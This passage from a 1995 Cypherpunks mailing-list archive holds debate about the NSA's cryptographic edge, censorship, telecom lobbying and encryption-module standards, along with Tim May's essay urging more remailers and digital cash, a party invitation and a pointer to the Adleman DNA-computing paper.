reluctant to challenge a "morality" amendment; and its
legislative vehicle, the telecommunications deregulation
legislation, stands a much better chance of passage this
year.

ACTION NEEDED NOW
   Action by the business community is needed now.  Please
notify your corporate government affairs office and/or your
legal counsel.  This measure could be adopted as an
amendment to the telecommunications bill IN A MATTER OF
WEEKS (or potentially added to any legislation pending on
the U.S. Senate floor), if business does not mobilize
against it.  S.314 will not stop digital pornography, but it
could devastate the messaging business.  If you are
interested in further information or are able to participate
in lobbying efforts over the next few weeks, contact Sarah
Reardon at EMA (see below).

------------------------------------------------------------
EMA ALERT is published and copyrighted (1995) by the
Electronic Messaging Association.  Permission to reproduce
and/or redistribute with attribution is hereby given to all
EMA members.  For more information about anything in EMA
ALERT, contact EMA via e-mail - use either X.400 (S=info;
O=ema; A=mci; C=us) or Internet (info@ema.org) address,
facsimile (1-703-524-5558), or telephone (1-703-524-5550).
Any EMA staff member can be addressed directly via e-mail by
using, for X.400, G=<firstname>; S=<lastname>; O=ema; A=mci;
C=us, and, for Internet, <firstinitial><lastname>@ema.org.
EMA's postal address is 1655 N. Fort Myer Dr. #850,
Arlington, VA 22209 USA.


------ End of Forwarded Message







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 18:31:17 PST
To: mpd@netcom.com (Mike Duvos)
Subject: The NSA (Was Re: Factoring - State of the Art and Predictions )
In-Reply-To: <199502130218.SAA00223@netcom3.netcom.com>
Message-ID: <9502130231.AA19651@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos says:
> Also, I think we make far too much of the magical ability of the
> NSA to do things.  At the present point in time, most of the
> cryptomathematical expertise in the world is external to the NSA.
> The NSA didn't invent GNFS, or for that matter, public key
> cryptography.

I'm on both sides of this issue. On the one hand, the people in the
open crypto community now, or soon will, substantially exceed in
number the people in the black community, and the people in the open
community have certain advantages in the way that they do their
work. On the other hand, the people in the black community have the
advantage that they can read anything that the open community produces
but not vice versa, and they have at least a 15 year edge in knowledge
about the design of conventional systems, and who knows (we certainly
have no idea) how much of an edge in the modern cryptographic
arena. We don't know for sure if the NSA knew about Public Key before
the open community did. Certainly they knew of differential
cryptanalysis and similar techniques, and they must know quite a lot
that we don't.

The black community also has lots of day-to-day experience that we
don't have, and they understand both the threat model and the
practical side of things a lot better than we do.

Overall, I'd say that in the long run the open community is going to
catch up regardless of what the NSA likes. That does not mean,
however, that this is going to happen particularly soon, or that they
don't still know decades more than we do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Sun, 12 Feb 95 23:20:24 PST
To: cypherpunks@toad.com
Subject: Re: UMich student arrested for rape story
Message-ID: <199502130721.XAA24596@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The July `94 issue of Harper's described the case of a Menlo Park city 
> employee who claimed in 1993 to be harassed by some paintings of female nudes
> hanging in a hallway. The city removed the paintings the following day. It
> used to be that when the majority of people in some state/county/town 
> disapproved of some instance of expression, they could suppress it. This was
> bad. Nowadays, it takes just one zealot to suppress it. This is much worse.
> As far as I can see, anyone can claim to be harassed/threatened/offended by
> just about anything, and get away with it.  Just the other day, I heard that
> in Vermont (or was it New Hampshire ?), they're still talking seriously about
> an amendment to the state constitution against burning the U.S. flag. Between
> the censors on the left and the censors on the right, there's precious little
> room remaining for those of us in the middle who believe in tolerating
> divergent views.
> 
Toleration of divergent views is not one of those issues that breaks 
out well along left-right polarities.  E.g., Andrea Dworkin's closest 
allies on porn are on the xtian right, not among her fellow radical 
feminists [contrary to the image promoted in some mass media].  
Threats to Catcher in the Rye in libraries are far more common than 
incidents like the one in Menlo Park.

> > Violence against women is too real, 
> 
> Strongly agreed, but a newsgroup article is not an act of violence.
> 
Legally, that's a question yet to be resolved.

In any case, this is hardly crypto-related.  I would far rather lurk 
as the mathematicians discuss factoring.  I learn more [even if I 
only get one word in three :-]


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 12 Feb 95 23:32:57 PST
To: cypherpunks@toad.com
Subject: The NSA (Was Re: Factoring - State of the Art and Predictions )
Message-ID: <199502130732.XAA28958@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:

 > On the other hand, the people in the black community have
 > the advantage that they can read anything that the open
 > community produces but not vice versa, and they have at
 > least a 15 year edge in knowledge about the design of
 > conventional systems, and who knows (we certainly have no
 > idea) how much of an edge in the modern cryptographic arena.

Such a situation does not apply solely to the NSA.  There are,
for instance, secret lodges of French mystics who devote
themselves to higher mathematics, absorb everything the open
community produces, and rarely publish anything or draw attention
to themselves.  They solve problems, write secret manuscripts,
put them on shelves, and have been doing this for centuries.
Perhaps the ultimate factoring algorithm already exists within
their walls.  We would never know if it did, unless they chose to
tell us.

The NSA is very good at solving problems that require "acres of
Crays".  They are crack numerical analysts and algorithm
designers. They also make nice block ciphers.  I do not think,
however, that they have deeply profound insights into the
complexity of computation that exceed those of the University
community, and certainly not by 15 years.

 > We don't know for sure if the NSA knew about Public Key
 > before the open community did. Certainly they knew of
 > differential cryptanalysis and similar techniques, and they
 > must know quite a lot that we don't.

Rumour has it that the NSA nearly had a collective epileptic fit
when they realized the implications of Public Key Cryptography.
Yes, they did invent differential cryptanalysis and some other
techniques before outsiders thought of them, but I'm unsure this
implies some great cabal of hidden knowledge on their part.  It is
more likely a case of throwing research dollars at a problem
which had not yet captured the interest of researchers outside
the intelligence community.

 > Overall, I'd say that in the long run the open community is
 > going to catch up regardless of what the NSA likes. That
 > does not mean, however, that this is going to happen
 > particularly soon, or that they don't still know decades
 > more than we do.

I think the NSA has lost its edge completely in the last decade,
as cryptographic research in the open community has taken off. It
is much the same sort of situation experienced by IBM, when they
were slow to catch on to the paradigm shift created by
distributed computing and workstations, and companies like Sun
rose from nowhere to become major players.

If the NSA were a corporation, they would be apologizing to their
shareholders, restructuring, and trying to identify a market
niche they could continue to be a player in.  Since they are
funded by government, we don't see them doing this, but it is
absurd to suggest that they are still decades ahead of the rest
of the world in basic research and technology.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aegis@netcom.com (Dale Harrison)
Date: Mon, 13 Feb 95 00:31:05 PST
To: cypherpunks@toad.com
Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
Message-ID: <199502130830.AAA02302@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I think the NSA has lost its edge completely in the last decade,
>as cryptographic research in the open community has taken off. It
>is much the same sort of situation experienced by IBM, when they
>were slow to catch on to the paradigm shift created by
>distributed computing and workstations, and companies like Sun
>rose from nowhere to become major players.
>
>If the NSA were a corporation, they would be apologizing to their
>shareholders, restructuring, and trying to identify a market
>niche they could continue to be a player in.  Since they are
>funded by government, we don't see them doing this, but it is
>absurd to suggest that they are still decades ahead of the rest
>of the world in basic research and technology.

As a former civilian TS Clearance holder working for the government, I can 
tell you I was amazed at what a small percentage of classified material 
really deserves to be classified.  90% of what I saw could be categorized as 
1) trivial, 2) in the public domain already, or 3) politically embarrassing.  
For example, look at the long classified human radiation experiments just 
coming to light. The government certainly wasn't hiding that info from the 
Russians, they were hiding it from the voters. I remember once fighting for 
months to get access to some classified papers on the fracture 
characteristics of ceramics only to find them to contain nothing that hadn't 
been available in the public domain for 20 years. This of course has a lot 
to do with the strange sociology of government bureaucracies where the 
combination of classified information with need-to-know restrictions create 
powerful petty-fiefdoms that lead to increased perks and prestige.  The 
other thing to realize is that inside the bureaucracies there's little in the 
way of the vigorous competition of ideas (primarily because of the 
manipulation of need-to-know restrictions) that characterizes academia.  
Bureaucracies tend to foster myopia and tunnel vision rather than risk 
taking and originality.  My guess (and it's only that) is that if all of 
NSA's secrets were laid bare, maybe 10% of what they have would be truly 
unique and the other 90% would be surprisingly pedestrian.

Dale H.

------------------------------------------------------------
  Dale W. Harrison, president       |  TEL: (713) 682-0501
  AEGIS Software Development, Inc.  |  FAX: (713) 623-0030
  12 Greenway Plaza, Suite 1100     |  aegis@netcom.com
  Houston, Texas 77046              |  daleh@ix.netcom.com
------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Mon, 13 Feb 95 01:00:13 PST
To: cypherpunks@toad.com
Subject: you are invited...
Message-ID: <199502130853.AAA16195@art.net>
MIME-Version: 1.0
Content-Type: text/plain




		       Valentines & Hearts Party!
		         	   @
		             Bryant's Bend	
		

	Our wonderful house at Bryant's Bend in Palo Alto, is having 
its annual Valentines Party on Valentines Day and we would love to have 
you join us in the celebrations. 

	We request that everyone who attends cum dressed in women's lingerie 
for this feastive occasion. Anyone showing up at the door "overdressed" 
will not be given entry to this event. I suggest visiting Victoria's Secret
as they are having sales on their silky lingerie... :)

	I realize the notice is short but hope you can make it
				anyways...  :)  


	When:   Tuesday Night (yes, that's this week)
	                  ((Feb 14, 1995))
	Time:   7:30 to late
	Where:	130 Bryant St.
		Palo Alto CA

	What to bring:  Yourselves, any veggie food items you enjoy
               (we're a veggie co-op :) and any drinks. We will
		be providing the atmosphere and some non-alcoholic 
		drinks and small munchies.... Drums and instruments
		are most welcome as well as games... 
		
	Activities for the evening:
		Be prepared to play "Spin the Heart" and "Truth or Dare"
		while you are there. We will also have dancing upstairs and 
		kissing in the famous "Kissin Corner"! So watch where 
		you walk... 


	Directions to this Awesome Party:

	From Highway 101 (North or south):  
	
		Take the University Exit that heads West. Follow
		University Street until you reach Bryant St.
		Make a right onto Bryant St. and follow it to the 
		end. We are the last house on the left hand side
		and are on the corner of Bryant St. and Palo Alto
		Way. It's a big tan house with brown trimmings.
	

Hope to see you there...

-lile

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lile Elam	    |  "a brush in hand, a wisp of wind, she sighs 
lile@art.net        |   knowing that this will be the great one..."	
http://www.art.net  |						    -lile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 12 Feb 95 21:56:03 PST
To: perry@imsi.com
Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
In-Reply-To: <9502130231.AA19651@snark.imsi.com>
Message-ID: <199502130554.AAA23466@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	A few weeks back Matt Blaze posted on top ten problems we
face.  I'll add two to that list.  First is our inability to
accurately assess the strength of various government agencies.  We
tend to make very pessimistic assumptions, which tends to be safe, but
having real data on which to base our assumptions would be better.

	The other problem we face is that people like Matt write solid
essays on various things, and no one responds.  People who write
essays, post solid mathematical results, etc, bemoan this pretty
regularly.  Fortunately, this problem is easier to address.  Try to
spend more time on the posts which people took longer on.  It's usually
obvious which those are.  The reason to spend more time on solid posts
is that someone took the time to write well on something.  If they get
solid feedback, they'll do more solid writing, and the quality of
discourse goes up.

Adam


Perry writes:
| The black community also has lots of day-to-day experience that we
| don't have, and they understand both the threat model and the
| practical side of things a lot better than we do.
| 
| Overall, I'd say that in the long run the open community is going to
| catch up regardless of what the NSA likes. That does not mean,
| however, that this is going to happen particularly soon, or that they
| don't still know decades more than we do.


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Sun, 12 Feb 95 22:09:52 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
In-Reply-To: <199502130554.AAA23466@bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950213010531.26741B-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Feb 1995, Adam Shostack wrote:

> Date: Mon, 13 Feb 1995 00:54:21 -0500 (EST)
> From: Adam Shostack <adam@bwh.harvard.edu>
> To: perry@imsi.com
> Cc: Cypherpunks Mailing List <cypherpunks@toad.com>
> Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
> 
> 
> 	A few weeks back Matt Blaze posted on top ten problems we
> face.  I'll add two to that list.  First is our inability to
> accurately assess the strength of various government agencies.  We
> tend to make very pessimistic assumptions, which tends to be safe, but
> having real data on which to base our assumptions would be better.

What you're talking about here is a cypherpunks intelligence capability.
If you think we are thought of as subversive and distasteful now, just 
wait to see what happens if anyone on the list outs the kind of 
information you're talking about about e.g., the NSA or the Justice Department.

Were this a private, closely held group instead of a public mailing list, 
you might have a different story.


> 
> 	The other problem we face is that people like Matt write solid
> essays on various things, and no one responds.  People who write
> essays, post solid mathematical results, etc, bemoan this pretty
> regularly.  Fortunately, this problem is easier to address.  Try to
> spend more time on the posts which people took longer on.  It's usually
> obvious which those are.  The reason to spend more time on solid posts
> is that someone took the time to write well on something.  If they get
> solid feedback, they'll do more solid writing, and the quality of
> discourse goes up.

There is an internet lore that says the more valuable and insightful a 
given article is, the less response it gets.

I hope this is right, as most of mine tend to be ignored.


> 
> Adam
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 						       -Hume
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 12 Feb 95 13:23:03 PST
To: cypherpunks@toad.com
Subject: Involve Telcos in activism?
Message-ID: <gate.c97F1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


storm@marlin.ssnet.com (Don Melvin):
>        Telecoms have bucks.
>        Telecoms have lawyers.
>        Telecoms are the 'transmission' agents for pretty much all of
>                the internet. Even high speed dedicated T1s are usually
>                from a telecom or two.

That's a laugh! Yes, it would be a good idea to involve telcos in our cause, 
but it was my impression that most cypherpunks expressed derision for the EFF 
for 'compromising' (i.e. being realistic). Telcos do not necessarily share the 
interests of cypherpunks; they want to make money, that's all. They'd love to 
compromise, and provide funding for CDT, Jerry Berman's new lobbying outfit. 
A good example of their attitude is what they do in India, or China. Here none 
of them are too keen to say anything against some of our ancient and idiotic 
laws, and they're all happy to budget for huge and unjustified 'licence fees' 
because they want to lick state ass. They want to grab these huge markets 
before it's too late, free speech be damned.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M00012@kanga.stcloud.msus.edu
Date: Sun, 12 Feb 95 23:17:00 PST
To: cypherpunks@toad.com
Subject: standards...
Message-ID: <950213011700.34a5@kanga.stcloud.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Cypherpunks,

Secure encryption programs should be / have (imo):

1.  Dynamic, allowing the user to select types of encryption
    on a per session basis, and to allow them to add crypto
    modules as they are developed in the future.
2.  Easy to use.
3.  All source code available--allowing users to fully
    compile (and examine) the source code.

Such programs should make use of encryption modules or
libraries, and should be able to easily adapt to new
modules as they become available.

An encryption module standard will help facilitate the
creation of the type of programs described above.


Some features...

  I.  Public key encryption.
      A.  Uses slower public key encryption to encrypt one or
          more session keys for one or more block ciphers.
      B.  Be used alone on larger blocks of data.  (The future
          may hold public key encryption algorithms that
          make this practical.)
      C.  Not limited to one public encryption scheme.
      D.  Function/format standards that allow user
          interfaces to implement various public key
          crypto functions.
 II.  Block Ciphers
      A.  Each block cipher has a committee assigned
          identification number.
      B.  Uses of random session key for encryption for
          non-public key encryption.
          1.)  Random session key is encrypted with
               hash of user supplied password.
          2.)  Encrypted session key is appended to
               ciphertext.
      C.  Function/format standards for easier chaining
          of multiple block ciphers in user interfaces
          that implement these functions.
          1.)  Minimize/mitigate/eliminate use of layer
               headers that would serve as known plaintext.
III.  Compression
      A.  Perhaps implemented in the same or similar format
          used for block ciphers.
      B.  Compression with a session key/random buffer
          source?  (Used to alter any tables and/or
          mitigate known plaintext attacks, e.g., if
          5 bits of a header are unused...fill these
          with unpredictable bits to be masked off
          later during decompression.)
      C.  Function/format standards (even though this will
          be, if a compression function is selected, the
          first function called)
          1.)  Minimize/mitigate/eliminate use of layer
               headers that would serve as known plaintext.
 IV.  Hash functions...
  V.  Validation (password and sig.s)
 VI.  Unpredictable (true random) number generation/distribution.
VII.  Variable key lengths.

Of course, this requires _STANDARDS_.  The cypherpunks are
the ideal people to define these standards (and start writing
such modules).  If others are working on this, I'd like to get
a copy of the standards so that I can contribute some code,
otherwise I am willing to help draft the standards--although
the significance of my contributions might amount to an
occasional unoriginal idea.

Some of the qualities listed above, it seems to me, might call
for the use of C++, although C is preferable.

Mike






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 12 Feb 95 13:23:49 PST
To: cypherpunks@toad.com
Subject: Clinton's No Warrant decree, and insulting dogs
Message-ID: <gate.kq8F1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Brad Dolan <bdolan@use.usit.net>:
> WARRANTLESS SEARCHES CAN NOW BE APPROVED BY FREEH, RENO, DOD, ET.
> AL. AND CONDUCTED BY ANY FED AGENCY.  DUE TO THE CRIME BILL, THE FED
> AGENCIES ARE NOW ALL OPERATING IN CONSOLIDATED "TASK FORCES."

Clinton's recent high-profile resort to executive orders reminds me of 
Yeltsin's 'democracy by decree'. I await with interest an American Chechnya.

However with the latest one he seems not to be ordering anything new, he's
just pulled something out of the legislative hat, he's just using powers
he's been given under the cited subsections of the Foreign Intelligence Act.
He seems happy to follow whatever little safeguards it has. How that Act
was never ruled unconstitutional beats me. 

Why is Clinton kowtowing to the Notional Security Agency and the Federal
Bureau of Instigation all of a sudden? Is this a 'law-and-order' shift to
the right of a New New Democrat?

Can we all stop insulting dogs? Lawrence Detweiler can be safely referred to
as LD. Rottweilers, as a correspondent writes with "great umbrage" in last 
week's Time, are "handsome, noble, courageous and steadfastly loyal."


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M00012@kanga.stcloud.msus.edu
Date: Sun, 12 Feb 95 23:41:00 PST
To: cypherpunks@toad.com
Subject: Re: Our Ignorance....
Message-ID: <950213014102.34a5@kanga.stcloud.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
> ...
> BTW, with an eye to avoiding rehashes of old flamewars, this does *not*
> constitute an invitation to scour the subscriber list for *.gov and *.mil and
> announce the results. Consult the archives if in doubt on this point.
>
>  -L. Futplex McCarthy
 
Even so, my guess is that 1/4 to 1/3 of the subscribers to this list
are interested government employees--though the most interested are
not using addresses with .gov or .mil.
 
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 13 Feb 95 01:54:20 PST
To: cypherpunks@toad.com
Subject: Is Cyberspace Rich Enough?
In-Reply-To: <199502130814.DAA16063@ducie.cs.umass.edu>
Message-ID: <199502130954.BAA19852@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:

> Lately, I've had the feeling that majordomo@toad echoes my epistles only back
> to me. None of the longer pieces I've written has elicited so much as a flame 
> from Eric, Perry, or even James in a while.

Should I feel left out by not being mentioned in this set? Or
relieved?

In any case, I agree that most responses are mostly reactive. Though
in defense of the Cypherpunks list, not nearly so reactive as are many
groups. Lots of lists and groups are dominated by in jokes, non
sequiturs, and other ephemera. At least this group quite often gets
into meaty issues.

> I've encountered an insidious hazard of high-volume lists (such as this) that
> probably snares other people too. It's altogether too easy to sit at one's
> mailer and merely react to whatever comes along. Obviously, if everyone did
> this all the time, nothing of substance would ever be accomplished. It's
> therapeutic, IMHO, to step back regularly, refocus on one's long term goals
> w.r.t the group, and push new initiatives.

Like a lot of you, I try to do this regularly. If people are
interested, they'll follow up. If not, they won't. Think of it as
evolution in action.

It so happens that the latest theme I've been thinking about is ready
to spring on you folks. If you respond, so be it.

That theme is this: Is cyberspace, or the Net/Web/Etc., sufficiently
rich or complex to meet our needs?

By "rich" or "complex" I mean in terms of "places to go," of "degrees
of freedom." For example, the multiplicity of routing paths for
messages, via remailers explicitly and via the underlying routing
options the Internet itself offers implicitly, gives certain major
advantages that a centralized system vulnerable to "choke points"
would not have. (The Internet gurus will likely jump in at this point
and blather about how this isn't so, how they could shut down the
Internet in several minutes with just their Leatherman tool and a few
O'Reilly books, but my point is not that it isn't _possible_, but that
the direction in which the Net has moved is generally one that makes
shut-down harder than more centralized alternatives.)

By our "needs" I mean roughly the Cypherpunks goals of privacy, free
choice, cybernetic free association, virtual communities,
anarcho-capitalism, etc. (Quibblers can dispute any of these, but
clearly most active posters on the list advocate some vector made up
of many of these diverse elements.)

So, what am I getting at?

Consider how the abstractions of the World Wide Web, URLs, HTML, HTTP,
and Web browsers have *increased the size of cyberspace* rather
dramatically in just the past two years. More places to visit, more
interconnectedness, more difficulties in controlling access to stuff,
etc. Home pages containing banned material are proliferating (a la the
Homolka-Teale ritualistic cannibalism trial in Canada, the Scientology
material, and so on--this is not the place for me to recap this).
Sure, ftp sites used to do this pretty well; in fact, I'm considering
ftp sites in this "evolution" toward greater complexity (in the
richness sense).

(Actually, cyberspace is partly getting "bigger" and partly
"increasing in dimensionality." Dimensionality of a space can be
related to how many neighbors one has....think of the two nearest
neighbors one has in a 1-D space, the 4 (or 8 if diagonals are
considered) neighbors in a 2-D space, the 6 in a 3-D space, and so on.
Arguably, if one has "100 close neighbors" in a space, it is roughly a
50 dimensional space. An equivalent formulation is in terms of the
radius of the n-sphere that everyone fits into. For example, the "six
degrees of separation," the 6 "handshakes" that separate nearly any
two people in America, suggests that American society is in some
important sense roughly a 15-17 dimensional space, because in some
sense all 250 million Americans "fit into" a hypersphere of radius 3
(diameter 6) when the dimensionality is around 17. (Or slightly lower,
as the slight corrections to V = r ^ n have to be included, which I'm
not bothering with). What "increased connectivity" does is to increase
dimensionality, about as one would expect from our usual metaphors
about "a multidimensional society" and "the world is
shrinking"...indeed it is shrinking, even as the absolute volume
increases.) 

What Cypherpunks should be pushing for, in my view, is this increased
dimensionality. More places to stick things, more places to escape
central control, and more degrees of freedom (which has a nice dual
meaning I once used as the working title for a novel I was working
on).

Is Cyberspace already rich enough (= high enough dimensionality) so
that central control cannot be reestablished (to the extent it ever
existed)?

Many of us think that it probably already is past this point, that
the "point of no return" has been reached. After all, the Soviets
couldn't stop samizdats, the Chinese couldn't stop fax machines, and
the Americans can't stop drug use, so what hope is there in
controlling modems, crypto, cellular phones, satellites, Web links,
steganography, terabytes of data flowing unobstructed across borders,
and so on. Just to "stop the Net" would disrupt the entire financial
system, which not even Clinton or the next (Republican) President
would be tempted to do....they might as well launch a nuclear war as
try to shut down this "anarchic" ( = high dimensionality) system.

But can we do more? One of my own wishes is to see hundreds (nay,
thousands!) of remailers, as these act as "teleportation booths" which
can dramatically increase connectivity. (They can increase the
connectivity in a different way than just straight connections
can...they "stitch together" otherwise visibly-connected regions with
unobservable connections, a desirable thing.)

What else?

* Lots more remailers. Run out of accounts, not just "remailer
machines." Accounts allow trivial proliferation of more remailers.

* Web access remailers. Like the "anonymous anonymous ftp," why not
explore combining Web systems with remailers? (Not so great for
browsing, of course, but there should be some interesting
possibilities.)

* More offshore sites, members, etc. This increases connectivity and
increases the "regulatory arbitrage" we so often talk about.

* Local corporate computer nets are "extra rooms in cyberspace," and
thus are harder to search. The equivalents of "rat lines" (in which
drugs are kept in one apartment and retrieved through a hole in the
wall, thus delaying/foiling searches and kick-in-the-door
raids....think of how technology makes all this so much easier).

* digital cash is of course of central importance. It glues commerce
together, but also greases it (a dual metaphor, not a mixed one). In
terms of the "richness" I'm talking about, it incentivizes the
colonization of cyberspace, the expansion of this space, and the
general richness.

* Alternative Nets, like FIDONet, are often lost in the discussion of
"the Net," but perhaps we should take much greater interest in these
alternatives. They make a crackdown harder, they lessen the dangers of
a single-point attack, and they provide "genetic diversity" for
building future Nets. (I'm not saying Cypherpunks have the time,
expertise, or incentive to work on this, but just reminding folks that
the Internet is not the end all and be all...)

* More users, more education, more articles....all increase
dimensionality, by expanding the space (e.g., key software on more
machines, accessible by more people, more home pages, etc.).

And so on. Increase the richness of cyberspace. More places, more
avenues, more rooms, more more. Make sure there's a "there," there.

Well, I've written too much, and as folks have noted, long posts get
fewer responses than do short ones, especially flamish ones.

Personally, I think there are fewer long essays and analyses for the
same reason there are fewer large predators than grass-munching
herbivores.

--Tim May


-- 

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sun, 12 Feb 95 23:21:41 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Our Ignorance of Govt. Capabilities
In-Reply-To: <Pine.SUN.3.91.950213010531.26741B-100000@access3.digex.net>
Message-ID: <199502130723.CAA15970@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:
> If you think we are thought of as subversive and distasteful now, just 
> wait to see what happens if anyone on the list outs the kind of 
> information you're talking about about e.g., the NSA or the Justice Department.
> 
> Were this a private, closely held group instead of a public mailing list, 
> you might have a different story.

IMHO, people generally don't share that sort of 
information here because they don't possess it, not because they fear
potential repercussions. Plenty of list subscribers seem able to shed their
inhibitions quite easily when it comes to criticizing organizations and 
revealing information. Full utilization of the most advanced available
remailer features offers at least the appearance of sufficient anonymity
for most people, AFAI can tell.

[Perhaps we could run a short survey: please respond if you could dish dirt 
 on a government security agency, but do not plan to do so on this list   ;]

BTW, with an eye to avoiding rehashes of old flamewars, this does *not*
constitute an invitation to scour the subscriber list for *.gov and *.mil and
announce the results. Consult the archives if in doubt on this point.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Sun, 12 Feb 95 23:49:24 PST
To: cypherpunks@toad.com
Subject: Re: Q: ref. for DNA used to solve math. network prob. (fwd)
Message-ID: <199502130745.CAA25356@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


The Adleman paper is on the web (I put it up).  The url is:

	http://www.hks.net/~cactus/doc/science/molecule_comp.html

I never completed typing the perspectives article since an article
appeared in Science that implied that Science doesn't consider it kosher
to reprint their articles.  As a member of the AAAS, I'm a bit appalled
by this position but for the moment I've stopped any progress on
entering Science articles into the Web.

Enjoy,
- - --
Todd Masco     | "Let me get this straight.  You're making a crypto toolkit,
cactus@hks.net |  and you're worried about it being _obscure_?" - Eric Hughes
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz7VORNhgovrPB7dAQHd3gQAgXnpCEQRIxzO6VQSarHhK7nH9j4kncbi
IlJawMbNnCf1RD9P3OD7art0w+180luFRJW9d93C5lq3Z36XhCOCgrcHrnGausCM
D87DWCEYECMxjuMa362NC1u79UGQ5MThwb4Tl6/kttYzLYyRfCiJLRwexJs5B6mX
6PaKGuNQDV4=
=Vgdm
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz8OFCoZzwIn1bdtAQFC3QGA39rHlZeQgpkQwtsTv0JUEK4UyftbMqSK
I8IHti1XiwbwSGgc6zzg5ga0ChRg0B8P
=pXZq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 13 Feb 95 00:12:59 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Does Anyone Even Read This Stuff ? (was Re: The NSA)
In-Reply-To: <Pine.SUN.3.91.950213010531.26741B-100000@access3.digex.net>
Message-ID: <199502130814.DAA16063@ducie.cs.umass.edu>
